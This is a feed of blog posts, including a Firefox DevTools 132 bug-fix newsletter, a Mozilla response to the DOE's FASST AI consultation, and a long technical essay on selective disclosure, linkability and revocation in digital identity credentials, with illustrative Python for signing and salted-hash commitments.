Betting odds called the 2024 election better than polls did. What does this mean for the future of prediction markets?

Prediction Markets for the Win

Just betting on an election every few years is not the interesting part, though. Info Finance is a broader concept. [I]nfo finance is a discipline where you (i) start from a fact that you want to know, and then (ii) deliberately design a market to optimally elicit that information from market participants.

Bonus links

The rise and fall of peer review - by Adam Mastroianni

The Great Redbox Cleanup: One Company is Hauling Away America’s Last DVD Kiosks

Both Democrats and Republicans can pass the Ideological Turing Test

The Verge Editor-In-Chief Nilay Patel breathes fire on Elon Musk and Donald Trump’s Big Tech enablers

2024-11-09 iron mountain atomic storage

How Upside-Down Models Revolutionized Architecture, Making Possible St. Paul’s Cathedral, Sagrada Família & More

Firefox Developer ExperienceFirefox DevTools Newsletter — 132

Developer Tools help developers write and debug websites on Firefox. This newsletter gives an overview of the work we’ve done as part of the Firefox 132 Nightly release cycle.

Want to help? DevTools are written in HTML, CSS and JS so any web developer can contribute! Read how to set up the work environment and check the list of mentored issues.

Firefox 133 is around the corner and I’m late to tell you about what was done in 132! This release does not offer any new features as the team is working on bigger tasks that are not yet visible to users. But it still contains a handful of important bug fixes, so let’s jump right in.

Offline mode and cached requests

When enabling Offline mode from the Network panel, cached requests would fail, which doesn’t match the actual behavior of the browser when there is no network (#1907304). This is fixed now and cached requests will succeed as you’d expect.

Inactive CSS and pseudo elements

You might be familiar with what we call Inactive CSS in the Inspector: small hints on declarations that don’t have any impact on the selected element because the property requires other properties to be set (for example, setting top on a non-positioned element). Sometimes we would show invalid hints on pseudo-element rules displayed in their binding elements (i.e. the ones that we show under the “Pseudo element” section), so we fixed this to avoid any confusion (#1583641).

Stable device detection on about:debugging

In order to debug Firefox for Android, you can go to about:debugging, plug your phone in via USB and inspect the tabs you have opened on your phone. Unfortunately, device detection was a bit flaky and the device sometimes wouldn’t show up in the list of connected phones. After some investigation, we found the culprit (adb is now grouping device status notifications in a single message), and device detection should be more stable (#1899330).

Service Workers console logs

Still in about:debugging, we introduced a regression a couple of releases ago that prevented any Service Worker console logs from being displayed in the console. The issue was fixed and we added automated tests to prevent regressing such an important feature (#1921384, #1923648).

Keyboard navigation

We tackled a few accessibility problems: in the Network panel, “Raw” toggles couldn’t be checked with the keyboard (#1917296), and the inspector filter input clear button couldn’t be focused with the keyboard (#1921001).

Misc

Finally, we fixed an issue where you couldn’t use the element picker after a canceled navigation from about:newtab (#1914863), as well as a pretty nasty Debugger crash that could happen when debugging userscript code (#1916086).

And that’s it for this month folks. Thank you for reading this and using our tools, see you in a few weeks for a new round of updates 🙂


Full list of fixed bugs in DevTools for the Firefox 132 release:

Mozilla Privacy BlogMozilla Responds to DOE’s RFI on the Frontiers in AI for Science, Security, and Technology (FASST)

This month, the US Department of Energy (DOE) released a Request for Information on its Frontiers in Artificial Intelligence for Science, Security, and Technology (FASST) initiative. Mozilla was eager to provide feedback, particularly given our recent focus on the emerging conversation around Public AI.

The Department of Energy’s (DOE’s) FASST initiative has the potential to create the foundation for Public AI infrastructure, which will not only help to enable increased access to critical technologies within the government that can be leveraged to create more efficient and useful services, but also potentially catalyze non-governmental innovation.

In addressing DOE’s questions outlined in the RFI, Mozilla focused on key themes including the myriad benefits of open source, the need to keep competition related to the whole AI stack top of mind, and the opportunity for FASST to help lead the development of Public AI by making the program “public” by default.

Below, we set out ideas in more depth. Mozilla’s response to DOE in full can be found here.

  • Benefits of Open Source: Given Mozilla’s long standing support of the open source community, a clear through line in Mozilla’s responses to DOE’s questions is the importance of open source in advancing key government objectives. Below are four key themes related to the benefits of open source:
    • Economic Security: Open source by its nature enables the more rapid proliferation of a technology and according to NTIA’s report on Dual-Use Foundation Models with Widely Available Model Weights, “They diversify and expand the array of actors, including less resourced actors, that participate in AI research and development.” For the United States, whose competitive advantage in global competition is its innovative private sector, the rapid proliferation of newly accessible technologies means that new businesses can be created on the back of a new technology, speeding innovation. Existing businesses, whether a hospital or a factory, can more easily adopt new technologies as well, helping to increase efficiency.
    • Expanding the Market for AI: While costs are rapidly decreasing, the use of cutting edge AI products purchased from major labs and big tech companies are not cheap. Many small businesses, research institutions, and nonprofits would be unable to benefit from the AI boom if they did not have the option to use freely available open source AI models. This means that more people around the world get access to American built open source technologies, furthering the use of American technology tools and standards, while forging deeper economic and technological ties.
    • Security & Safety: Open source has had demonstrable security and safety benefits. Rather than a model of “security through obscurity,” open source AI thrives from having many eyes examining code bases and models for exploits by harnessing the wisdom of the crowd to find issues, whether related to discriminatory outputs from LLMs or security vulnerabilities.
    • Resource Optimization: Open source in AI means more than freely downloadable model weights – it means considering how to make the entire AI stack more open and transparent, from the energy cost of training to data on the resources used to develop the chips necessary to train and operate AI models. By making more information on AI’s resource usage open and transparent, we can collectively work to optimize the efficiency of AI, ensuring that the benefits truly outweigh the costs.
  • Keep Competition Top of Mind: The U.S. government wields outsized influence in shaping markets, not just through its role as a promulgator of standards and regulations but also through its purchasing power. We urge the DOE to consider broader competitive concerns when determining potential vendors and partnerships for products and services, ranging from cloud resources to semiconductors. This would foster a more competitive AI ecosystem, as noted in OMB’s guidance to Advance the Responsible Acquisition of AI in Government, which highlights the importance of promoting competition in procurement of AI. The DOE should make an effort to work with a range of partners and civil society organizations rather than defaulting to standard government partners and big tech companies.
  • Making FASST “Public” By Default: It is critical that as FASST engages in the development of new models, datasets, and other tools and resources, it makes its work public by default. This may mean directly open sourcing datasets and models, or working with partners, civil society, academia, and beyond to advance access to AI assets which can provide public value.

We applaud DOE’s commitment to advancing open, public-focused AI, and we’re excited about the potential of the FASST program. Mozilla is eager to work alongside DOE and other partners to make sure FASST supports the development of technology that serves the public good. Here’s to a future where AI is open, accessible, and beneficial for everyone.

The post Mozilla Responds to DOE’s RFI on the Frontiers in AI for Science, Security, and Technology (FASST) appeared first on Open Policy & Advocacy.

Martin ThompsonEverything you need to know about selective disclosure

Why does this matter?

A lot of governments are engaging with projects to build “Digital Public Infrastructure”. That term covers a range of projects, but one of the common and integral pieces relates to government-backed identity services. While some places have had some form of digital identity system for years — hi Estonia! — there are many more governments looking to roll out some sort of digital identity wallet for their citizens. Notably, the European Union recently passed a major update to their European Digital Identity Regulation, which seeks to have a union-wide digital identity system for all European citizens. India’s Aadhaar is still the largest such project with well over a billion people enrolled.

There are a few ways that these systems end up being implemented, but most take the same basic shape. A government agency will be charged with issuing people with credentials. That might be tied to driver licensing, medical services, passports, or it could be a new identity agency. That agency issues digital credentials that are destined for wallets in phones. Then, services can request that people present these credentials at certain points, as necessary.

The basic model that is generally used looks something like this:

Three boxes with arrows between each in series, in turn labeled: Issuer, Holder, Verifier

The government agency is the “issuer”, your wallet app is a “holder”, and the service that wants your identity information is a “verifier”.

This is a model for digital credentials that is useful in describing a lot of different interactions. A key piece of that model is the difference between a credential, which is the thing that ends up in a wallet, and a presentation, which is what you show a verifier.

This document focuses on online use cases. That is, where you might be asked to present information about your identity to a website. Though there are many other uses for identity systems, online presentation of identity is becoming more common. How we use identity online is likely to shape how identity is used more broadly.

The goal of this post is to provide information and maybe a fresh perspective on the topic. This piece also has a conclusion that suggests that the truly hard problems in online identity are not technical in nature, so do not necessarily benefit from the use of selective disclosure. As much as selective disclosure is useful in some contexts, there are significant challenges in deploying it on the Web.

What is selective disclosure?

A presentation might be a reduced form of the credential. Let’s say that you have a driver license, like the following:

A photo of a (fake) Hawaii driver license

One way of thinking about selective disclosure is to think of it as redacting those parts of the credential that you don’t want to share.

Let’s say that you want to show that you are old enough to buy alcohol. You might imagine doing something like this:

A photo of a (fake) Hawaii driver license with some fields covered with black boxes

That is, if you were presenting that credential to a store in person, you would want to show that the card truly belongs to you and that you are old enough.

If you aren’t turning up in person, the photo and physical description are not that helpful, so you might cover those as well.

You don’t need to share your exact birth date to show that you are old enough. You might be able to cover the month and day of those too. That is still too much information, but it is the best you can easily manage with a black highlighter.

If there was a “can buy alcohol” field on the license, that might be even better. But the age at which you can legally buy alcohol varies quite a bit across the world. And laws apply to the location, not the person. A 19 year old from Canada can’t buy alcohol in the US just because they can buy alcohol at home[1]. Most digital credential systems have special fields to allow for this sort of rule, so that a US[2] liquor store could use an “over_21” property, whereas a purchase in Canada might check for “over_18” or “over_19” depending on the province.

Simple digital credentials

The simplest form of digital credential is a bag of attributes, covered by a digital signature from a recognized authority. For instance, this might be a JSON Web Token, which is basically just a digitally-signed chunk of JSON.

For our purposes, let’s run with the example, which we’d form into something like this:

{
  "number": "01-47-87441",
  "name": "McLOVIN",
  "address": "892 MOMONA ST, HONOLULU, HI 96820",
  "iss": "1998-06-18",
  "exp": "2008-06-03",
  "dob": "1981-06-03",
  "over_18": true,
  "over_21": true,
  "over_55": false,
  "ht": "5'10",
  ...
}

That could then be wrapped up and signed by whatever Hawaiian DMV issues the license. Something like this:

Two nested boxes, the inner containing text "McLOVIN's Details"; the outer containing text "Digital Signature"
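As a rough sketch of that structure, here is how signing a plain attribute bag might look in Python with an Ed25519 key. The field names follow the example above, but the key handling and encoding are purely illustrative; deployed systems use formats like JWTs or mdocs.

import json
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Hypothetical issuer key; a real DMV would keep this in an HSM.
issuer_key = Ed25519PrivateKey.generate()

claims = {
    "number": "01-47-87441",
    "name": "McLOVIN",
    "dob": "1981-06-03",
    "over_21": True,
}

# Serialize deterministically so the signature can be checked later.
payload = json.dumps(claims, sort_keys=True).encode()
credential = {
    "payload": payload.hex(),
    "signature": issuer_key.sign(payload).hex(),
}

Anyone holding the issuer’s public key can check the signature and read every field.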

That isn’t perfect, because a blob of bytes like that can just be copied around by anyone that receives that credential. Anyone that received a credential could “impersonate” our poor friend.

The way that problem is addressed is through the use of a digital wallet. The issuer requires that the wallet hold a second signing key. The wallet provides the issuer with an attestation, which is just evidence from the wallet maker (which is often the maker of your phone) that they are holding a private key in a place where it can’t be moved or copied[3]. That attestation includes the public key that matches that private key.

Once the issuer is sure that the private key is tied to the device, the issuer produces a credential that lists the public key from the wallet.

In order to use the credential, the wallet signs the credential along with some other stuff, like the current time and maybe the identity of the verifier[4], as follows:

Nested boxes, the outer containing text "Digital signature using the Private Key from McLOVIN's Wallet"; two at the next level the first containing text "Verifier Identity, Date and Time, etc...", the other containing text "Digital Signature using the Private Key of the Hawaii DMV"; the latter box contains two further boxes containing text "McLOVIN's Details" and "McLOVIN's Wallet Public Key"

With something like this, unless someone is able to use the signing key that is in the wallet, they can’t generate a presentation that a verifier will accept. It also ensures that the wallet can use a biometric or password check to ensure that a presentation is only created when the person allows it.
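Here is a minimal sketch of that holder binding, again using Ed25519 and invented field names; the real wallet protocols and attestation formats are considerably more involved.

import json, time
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

issuer_key = Ed25519PrivateKey.generate()
wallet_key = Ed25519PrivateKey.generate()   # kept in secure hardware in practice

wallet_pub = wallet_key.public_key().public_bytes(
    serialization.Encoding.Raw, serialization.PublicFormat.Raw)

# The issuer binds the claims to the wallet's public key.
inner = json.dumps({
    "claims": {"name": "McLOVIN", "over_21": True},
    "wallet_key": wallet_pub.hex(),
}, sort_keys=True).encode()
credential = {"inner": inner.hex(), "issuer_sig": issuer_key.sign(inner).hex()}

# The wallet produces a presentation bound to this verifier and moment in time.
outer = json.dumps({
    "credential": credential,
    "verifier": "liquor-store.example",
    "time": int(time.time()),
}, sort_keys=True).encode()
presentation = {"outer": outer.hex(), "wallet_sig": wallet_key.sign(outer).hex()}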

That is a basic presentation that includes all the information that the issuer knows about. The problem is that this is probably more than you might be comfortable with sharing with a liquor store. After all, while you might be able to rely on the fact that the cashier in a store isn’t copying down your license details, you just know that any digital information you present is going to be saved, stored, and sold. That’s where selective disclosure is supposed to help.

Salted hash selective disclosure

One basic idea behind selective disclosure is to replace all of the data elements in a credential — or at least the ones that someone might want to keep to themselves — with placeholders. Each placeholder is a commitment to the actual value. Any values that someone wants to reveal are then included in the presentation. A verifier can validate that the revealed value matches the commitment.

The most basic sort of commitment is a hash commitment. That uses a hash function, which is really anything where it is hard to produce two inputs that result in the same output. The commitment to a value of X is H(X).

That is, you might replace the (“name”, “McLOVIN”) pair with a commitment like H(“name” || “McLOVIN”). The hash function ensures that it is easy to validate that the underlying values match the commitment, because the verifier can compute the hash for themselves. But it is basically impossible to recover the original values from the hash. And it is similarly difficult to find another set of values that hash to the same value, so you can’t easily substitute false information.

A key problem is that a simple hash commitment only protects the value of the input if that input is hard to guess in the first place. But most of the stuff on a license is pretty easy to guess in one way or another. For simple stuff like “over_21”, there are just two values: “true” or “false”. If you want to know the original value, you can just check each of the values and see which matches.
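That guessing attack is trivial to carry out. Here is a toy sketch, assuming an unsalted SHA-256 commitment over the concatenated field name and value:

import hashlib

def commit(name: str, value: str) -> bytes:
    # Unsalted commitment: fine for hiding high-entropy secrets, useless here.
    return hashlib.sha256((name + value).encode()).digest()

hidden = commit("over_21", "true")   # what the credential would carry

# Anyone can recover the value by trying every candidate.
for guess in ("true", "false"):
    if commit("over_21", guess) == hidden:
        print("over_21 is", guess)   # prints: over_21 is true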

Even for fields that have more values, it is possible to build a big table of hash values for every possible (or likely) value. This is called a “rainbow table”[5].

A diagram showing mappings from hashes to values

Rainbow tables don’t work if the committed value is very hard to guess. So, in addition to the value of the field, a large random number is added to the hidden value. This number is called “salt” and a different value needs to be generated for every field that can be hidden, with different values for every new credential. As long as there are many more values for the salt than can reasonably be stored in a rainbow table, there is no easy way to work out which commitment corresponds to which value.

So for each field, the issuer generates a random number and replaces all fields in the credential with H(salt || name || value), using some agreed encoding. The issuer then signs over those commitments and provides the wallet with a credential that is full of commitments, plus the full set of values that were committed to, including the associated salt.

A credential containing commitments to values, with the value and associated salt alongside
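A sketch of that issuance step, with a fresh random salt per field and the encoding simplified to plain concatenation (real formats define the encoding precisely):

import hashlib, json, secrets
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

def commit(salt: bytes, name: str, value: str) -> str:
    return hashlib.sha256(salt + name.encode() + value.encode()).hexdigest()

claims = {"name": "McLOVIN", "dob": "1981-06-03", "over_21": "true"}

disclosures = []   # handed to the wallet alongside the credential
commitments = []   # the only thing the issuer signs over
for name, value in claims.items():
    salt = secrets.token_bytes(16)          # fresh 128-bit salt per field
    disclosures.append({"salt": salt.hex(), "name": name, "value": value})
    commitments.append(commit(salt, name, value))

issuer_key = Ed25519PrivateKey.generate()
signed = json.dumps(commitments).encode()
credential = {"commitments": commitments, "issuer_sig": issuer_key.sign(signed).hex()}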

The wallet can then use the salt and the credential to reveal a value and prove that it was included in the credential, creating a presentation something like this:

A presentation using the credential, with selected values and their salt alongside

The verifier then gets a bunch of fields with the key information replaced with commitments. All of the commitments are then signed by the issuer. The verifier also gets some number of unsigned tuples of (salt, name, value). The verifier can then check that H(salt || name || value) matches one of the commitments.
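Continuing the issuance sketch above, the verifier’s check is just two steps: validate the issuer signature over the commitments, then hash each revealed tuple and look for it among the signed commitments.

import hashlib, json
from cryptography.exceptions import InvalidSignature

def commit(salt: bytes, name: str, value: str) -> str:
    return hashlib.sha256(salt + name.encode() + value.encode()).hexdigest()

def verify_presentation(credential, revealed, issuer_public_key):
    # 1. The commitments must carry a valid issuer signature.
    signed = json.dumps(credential["commitments"]).encode()
    try:
        issuer_public_key.verify(bytes.fromhex(credential["issuer_sig"]), signed)
    except InvalidSignature:
        return {}
    # 2. Each revealed (salt, name, value) tuple must match a signed commitment.
    accepted = {}
    for d in revealed:
        if commit(bytes.fromhex(d["salt"]), d["name"], d["value"]) in credential["commitments"]:
            accepted[d["name"]] = d["value"]
    return accepted

# Revealing only the "over_21" disclosure from the issuance sketch would return
# {"over_21": "true"} without exposing the name or date of birth.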

This is the basic design that underpins a number of selective disclosure designs. Salted hash selective disclosure is pretty simple to build because it doesn’t require any fancy cryptography. However, salted hash designs have some limitations that can be a little surprising.

Other selective disclosure approaches

There are other approaches that might be used to solve this problem. Imagine that you had a set of credentials, each of which contained a single attribute. You might imagine sharing each of those credentials separately, choosing which ones you show based on what the situation demanded.

That might look something like this:

A presentation that includes multiple separate credentials, each with a single attribute
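A sketch of the one-credential-per-attribute idea, using ordinary Ed25519 signatures for illustration (BLS aggregation, which would fold all of these signatures into one, is elided here):

import json
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

issuer_key = Ed25519PrivateKey.generate()
claims = {"name": "McLOVIN", "dob": "1981-06-03", "over_21": "true"}

# One tiny credential per attribute; the holder keeps them all.
per_attribute = {}
for name, value in claims.items():
    blob = json.dumps({name: value}).encode()
    per_attribute[name] = {"blob": blob.hex(), "sig": issuer_key.sign(blob).hex()}

# To show only age eligibility, the holder presents just that entry.
presentation = {"over_21": per_attribute["over_21"]}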

Having multiple signatures can be inefficient, but this basic idea is approximately sound[7]. There are a lot of signatures, which would make a presentation pretty unwieldy if there were lots of properties. There are digital signature schemes that make this more efficient though, like the BLS scheme, which allows multiple signatures to be folded into one.

That is the basic idea behind SD-BLS. SD-BLS doesn’t make it cheaper for an issuer. An issuer still needs to sign a whole bunch of separate attributes. But combining signatures means that it can make presentations smaller and easier to verify. SD-BLS has some privacy advantages over salted hashes, but the primary problem that the SD-BLS proposal aims to solve is revocation, which is covered in more detail below.

Problems with salted hashes

Going back to the original example, the effect of the salted hash is that you probably get something like this:

A Hawaii driver license with all the fields covered with gray rectangles, except the expiry date

Imagine that every field on the license is covered with the gray stuff you get on scratch lottery tickets. You can choose which to scratch off before you hand it to someone else[8]. Here’s what they learn:

  1. That this is a valid Hawaii driver license. That is, they learn who issued the credential.
  2. When the license expires.
  3. The value of the fields that you decided to reveal.
  4. How many fields you decided not to reveal.
  5. Any other places that you present that same credential, as discussed below.

On the plus side, and contrary to what is shown for a physical credential, the size and position of fields are not revealed for a digital credential.

Still, that is likely a bit more information than might be expected. If you only wanted to reveal the “over_21” field so that you could buy some booze, having to reveal all those other things isn’t exactly ideal.

Revealing who issued the credential seems like it might be harmless, but for a digital credential, that’s revealing a lot more than your eligibility to obtain liquor. Potentially a lot more. Maybe in Hawaii, holding a Hawaii driver license isn’t notable, but it might be distinguishing — or even disqualifying — in other places. A Hawaii driver license reveals that you likely live in Hawaii, which is not exactly relevant to your alcohol purchase. It might not even be recognized as valid in some places.

If the Hawaiian DMV uses multiple keys to issue credentials, you’ll also reveal which of those keys was used. That’s unlikely to be a big deal, but worth keeping in mind as we look at alternative approaches.

Revealing the number of fields is a relatively minor information leak. This constrains the design a little, but not in a serious way. Basically, it means that you should probably have the same set of fields for everyone.

For instance, you can’t include only the “over_XX” age fields that are true; you have to include the false ones as well or the number of fields would reveal an approximate age. That is, avoid:

{ ..., "older_than": [16, 18], ... }

Note: Some formats allow individual items in lists like this to be committed separately. The name of the list is generally revealed in that case, but the specific values are hidden. These usually just use H(salt || value) as the commitment.

And instead use:

{ ..., "over_16": true, "over_18": true, "over_21": false, "over_55": false, ... }

Expiration dates are tricky. For some purposes, like verifying that someone is allowed to drive, the verifier will need to know if the credential is not expired.

On the other hand, expiry is probably not very useful for something like age verification. After all, it’s not like you get younger once your license expires.

The exact choice of expiration date might also carry surprising information. Imagine that only one person was able to get a license one day because the office had to close or the machine broke down. If the expiry date is a fixed time after issuance, the expiry date on their license would then be unique to them, which means that revealing that expiration date would effectively be identifying them.

The final challenge here is the least obvious and most serious shortcoming of this approach: linkability.

Linkability and selective disclosure

A salted hash credential carries several things that makes the credential itself identifiable. This includes the following:

  • The value of each commitment is unique and distinctive.
  • The public key for the wallet.
  • The signature that the issuer attaches to the credential.

Each of these is unique, so if the same credential is used in two places, it will clearly indicate that this is the same person, even if the information that is revealed is very limited.

For example, you might present an “over_21” to purchase alcohol in one place, then use the full credential somewhere else. If those two presentations use the same credential, those two sites will be able to match up the presentations. The entity that obtains the full credential can then share all that knowledge with the one that only knows you are over 21, without your involvement.

A version of the issuer-holder-verifier diagram with multiple verifiers

Even if the two sites only receive limited information, they can still combine the information they obtain — that you are over 21 and what you did on each site — into a profile. The building of that sort of profile online is known as unsanctioned tracking and generally regarded as a bad thing.

This sort of matching is technically called verifier-verifier linkability. The way that it can be prevented is to ensure that a completely fresh credential is used for every presentation. That includes a fresh set of commitments, a new public key from the wallet, and a new signature from the issuer (naturally, the thing that is being signed is new). At the same time, ensuring that the presentation doesn’t include any extraneous information, like expiry dates, helps.

A system like this means that wallets need to be able to handle a whole lot of credentials, including fresh public keys for each. The wallet also needs to be able to handle cases where its store of credentials runs out, especially when the wallet is unable to contact the issuer.

Issuers generally need to be able to issue larger batches of credentials to avoid that happening. That involves a lot of computationally intensive work for the issuer. This makes wallets quite a bit more complex. It also increases the cost of running issuance services because they need better availability, not just because they need more issuance capacity.

In this case, SD-BLS has a small advantage over salted hashes because its “unregroupability” property means that presentations with differing sets of attributes are not linkable by verifiers. That’s a weaker guarantee than verifier-verifier unlinkability, because presentations with the same set of attributes can still be linked by a verifier; for that, fresh credentials are necessary.

Using a completely fresh credential is a fairly effective way to protect against linkability for different verifiers, but it does nothing to prevent verifier-issuer linkability. An issuer can remember the values they saw when they issued the credential. A verifier can take any one of the values from a presentation they receive (commitments, public key, or signature) and ask the issuer to fill in the blanks. The issuer and verifier can then share anything that they know about the person, not limited to what is included in the credential.

A version of the issuer-holder-verifier diagram with a bidirectional arrow between issuer and verifier

What the issuer and verifier can share isn’t limited to the credential. They can share anything they know, not just the stuff that was included in the credential. Maybe McLovin needed to show a passport and a utility bill in order to get a license and the DMV kept a copy. The issuer could give that information to the verifier. The verifier can also share what they have learned about the person, like what sort of alcohol they purchased.

Useful linkability

In some cases, linkability might be a useful or essential feature. Imagine that selective disclosure is used to authorize access to a system that might be misused. Selective disclosure avoids exposing the system to information that is not essential. Maybe the system is not well suited to safeguarding private information. The system only logs access attempts and the presentation that was used.

In the event that the access results in some abuse, the abuse could be investigated using verifier-issuer linkability. For example, the access could be matched to information available to the issuer to find out who was responsible for the abuse.

The IETF is developing a couple of salted hash formats (in JSON and CBOR) that should be well suited to a number of applications where linkability is a desirable property.

All of this is a pretty serious problem for something like online age verification. Having issuers, which are often government agencies, in a position to trace activity might have an undesirable chilling effect. This is something that legislators generally recognize and laws often include provisions that require unlinkability[9].

In short, salted hash based systems only work if you trust the issuer.

Linkable attributes

There is not much point in avoiding linkability when the disclosed information is directly linkable. For instance, if you selectively disclose your name and date of birth, that information is probably unique or highly identifying. Revealing identifying information to a verifier makes verifier-issuer linkability easy; just like revealing the same information to two verifiers makes verifier-verifier linkability simple.

This makes linkability for selective disclosure less concerning when it comes to revealing information that might be identifying.

Unlinkability therefore tends to be most useful for non-identifying attributes. Simple attributes — like whether someone meets a minimum age requirement, holds a particular qualification, or has authorization — are less likely to be inherently linkable, so are best suited to being selectively disclosed.

Privacy Pass

If the goal is to provide a simple signal, such as whether a person is older than a target age, Privacy Pass is specifically designed to prevent verifier-issuer linkability.

Privacy Pass also includes options that split the issuer into two separate functions — an issuer and an attester — where the attester is responsible for determining if a holder (or client) has the traits required for token issuance and the issuer only creates the tokens. This might be used to provide additional privacy protection.

The four entities of the Privacy Pass architecture: Issuer, Attester, Holder/Client, and Verifier/Service

A Privacy Pass issuer could produce a token that signifies possession of a given trait. Only those with the trait would receive the token. For age verification, the token might signify that a person is at a selected age or older.

Token formats for Privacy Pass that include limited public information are also defined, which might be used to support selective disclosure. This is far less flexible than the salted hash approach as a fresh token needs to be minted with the set of traits that will be public. That requires that the issuer is more actively involved or that the different sets of public traits are known ahead of time.

Privacy Pass does not naturally provide verifier-verifier unlinkability, but a fresh token could be used for each usage, just like for the salted hash design. Some of the Privacy Pass modes can issue a batch of tokens for this reason.

In order to provide tokens for different age thresholds or traits, an issuer would need to use different public keys, each corresponding to a different trait.

Privacy Pass is therefore a credible alternative to the use of salted hash selective disclosure for very narrow cases. It is somewhat inflexible in terms of what can be expressed, but that could mean more deliberate additions of capabilities. The strong verifier-issuer unlinkability is definitely a plus, but it isn’t without shortcomings.

Key consistency

One weakness of Privacy Pass is that it depends on the issuer using the same key for everyone. The ideal privacy is provided when there is a single issuer with just one key for each trait. With more keys or more issuers, the key that is used to generate a token carries information, revealing who issued the token. This is just like the salted hash example where the verifier needs to learn that the Hawaiian DMV issued the credential.

The privacy of the system breaks down if every person receives tokens that are generated using a key that is unique to them. This risk can be limited through the use of key consistency schemes. This makes the system a little bit harder to deploy and operate.

As foreshadowed earlier, the same key switching concern also applies to a salted hash design if you don’t trust the issuer. Of course, we’ve already established that a salted hash design basically only works if you trust the issuer. Salted hash presentations are linkable based on commitments, keys, or signatures, so there is no real need to play games with keys.

Anonymous credentials

A zero knowledge proof enables the construction of evidence that a prover knows something, without revealing that information. For an identity system, it allows a holder to make assertions about a credential without revealing that credential. That creates what is called an anonymous credential.

Anonymous credentials are appealing as the basis for a credential system because the proofs themselves contain no information that might link them to the original credential.

Verifier-issuer unlinkability is a natural consequence of using a zero knowledge proof. Verifier-verifier unlinkability would be guaranteed by providing a fresh proof for each verifier, which is possible without obtaining a fresh credential. The result is that anonymous credentials provide excellent privacy characteristics.

Zero knowledge proofs trace back to systems of provable computation, which mean that they are potentially very flexible. A proof can be used to prove any property that can be computed. The primary cost is in the amount of computation it takes to produce and validate the proof[10]. If the underlying credential can be adjusted to support the zero knowledge system, these costs can be reduced, which is what the BBS signature scheme does. Unmodified credentials can be used if necessary.

Thus, a proof statement for use in age verification might be a machine translation of the following compound statement:

  • this holder has a credential signed by the Hawaiian DMV;
  • the expiration date on the credential is later than the current date;
  • the person is 21 or older (or the date of birth plus 21 years is earlier than the current date);
  • the holder knows the secret key associated with the public key mentioned in the credential; and,
  • the credential has not been used with the current verifier more than once on this day[11].

A statement in that form should be sufficient to establish that someone is old enough to purchase alcohol, while providing assurances that the credential was not stolen or reused. The only information that is revealed is that this is a valid Hawaiian license. We’ll see below how hiding that last bit is also possible and probably a good idea.

Reuse protections

The last statement from the set of statements above provides evidence that the credential has not been shared with others. This condition, or something like it, is a necessary piece of building a zero-knowledge system. Otherwise, the same credential can be used and reused many times by multiple people.

Limiting the number of uses doesn’t guarantee that a credential isn’t shared, but it limits the number of times that it can be reused. If the credential can only be used once per day, then that is how many times the credential can be misused by someone other than the person it was issued to.

Choosing how many times a credential might be used will vary with the exact circumstances. For instance, it might not be necessary to have the same person present proof of age to an alcohol vendor multiple times per day. Maybe it would be reasonable for the store to remember them if they come back to make multiple purchases on any given day. One use per day might be reasonable on that assumption.

In practice, multiple rate limits might be used. This can make the system more flexible over short periods (to allow for people making multiple alcohol purchases in a day) but also stricter over the long term (because people rarely need to make multiple purchases every day). For example, age checks for the purchase of alcohol might combine a three per day limit with a weekly limit of seven. Multiple conditions can be easily added to the proof, with a modest cost.
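A minimal sketch of the holder-side bookkeeping for that kind of combined limit, using the illustrative numbers from above (three per day, seven per week) and tracking usage per verifier:

from collections import defaultdict
from datetime import date, timedelta

DAILY_LIMIT = 3
WEEKLY_LIMIT = 7

# verifier -> dates on which a presentation was made
usage = defaultdict(list)

def may_present(verifier: str, today: date) -> bool:
    week_ago = today - timedelta(days=7)
    recent = [d for d in usage[verifier] if d > week_ago]
    usage[verifier] = recent                      # drop stale entries
    used_today = sum(1 for d in recent if d == today)
    return used_today < DAILY_LIMIT and len(recent) < WEEKLY_LIMIT

def record_presentation(verifier: str, today: date) -> None:
    usage[verifier].append(today)

The proof presented to the verifier would then assert that these limits hold, and the wallet simply refuses to create a presentation once a limit is reached.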

It is also possible for each verifier to specify their own rate limits according to their own conditions. A single holder would then limit the use of credentials according to those limits.

Tracking usage is easy for a single holder. An actor looking to abuse credentials by sharing and reusing them has more difficulty. A bad actor would need to carefully coordinate their reuse of a credential so that any rate limits were not exceeded.

Hiding the issuer of credentials

People often do not get to choose who issues them a credential. Revealing the identity of an issuer might be more identifying than is ideal. This is especially true for people who have credentials issued by an atypical issuer.

Consider that Europe is building a union-wide system of identity. That means that verifiers will be required to accept credentials from any country in the EU. Someone accessing a service in Portugal with an Estonian credential might be unusual if most people use a Portuguese credential. Even if the presentation is limited to something like age verification, the choice of issuer becomes identifying.

This could also mean that a credential that should be valid is not recognized as such by a verifier, simply because they chose not to consider that issuer. Businesses in Greece might be required by law to recognize other EU credentials, but what about a credential issued by Türkiye?

Zero knowledge proofs can also hide the issuer, only revealing that a credential was issued by one of a set of issuers. This means that a verifier is unable to discriminate on the basis of issuer. For a system that operates at scale, that creates positive outcomes for those who hold credentials from atypical issuers.

Credential revocation

Perhaps the hardest problem in any system that involves the issuance of credentials is what to do when the credential suddenly becomes invalid. For instance, if a holder is a phone, what do you do if the phone is lost or stolen?

That is the role of revocation. On the Web, certificate authorities are required to have revocation systems to deal with lost keys, attacks, change of ownership, and a range of other problems. For wallets, the risk of loss or compromise of wallets might also be addressed with revocation.

Revocation typically involves the verifier confirming with the issuer that the credential issued to the holder (or the holder itself) has not been revoked. That produces a tweak to our original three-entity system as follows:

Issuer-holder-verifier model with an arrow looping back from verifier to issuer

Revocation is often the most operationally challenging aspect of running identity infrastructure. While issuance might have real-time components — particularly if the issuer needs to ensure a constant supply of credentials to maintain unlinkability — credentials might be issued ahead of time. However, revocation often requires a real-time response or something close to it. That makes a system with revocation much more difficult to design and operate.

Revoking full presentations

When a full credential or more substantive information is compromised, lack of revocation creates a serious impersonation risk. The inability to validate biometrics online means that a wallet might be exploited to perform identity theft or similarly serious crimes. Being able to revoke a wallet could be a necessary component of such a system.

The situation with a complete credential presentation, or presentations that include identifying information, is therefore fairly simple. When the presentation contains identifying information, like names and addresses, preventing linkability provides no benefit. So providing a direct means of revocation checking is easy.

With verifier-issuer linkability, the verifier can just directly ask the issuer whether the credential was revoked. This is not possible if there is a need to perform offline verification, but it might be possible to postpone such checks or rely on batched revocations (CRLite is a great example of a batched revocation system). Straightforward or not, providing adequate scale and availability make the implementation of a reliable revocation system a difficult task.

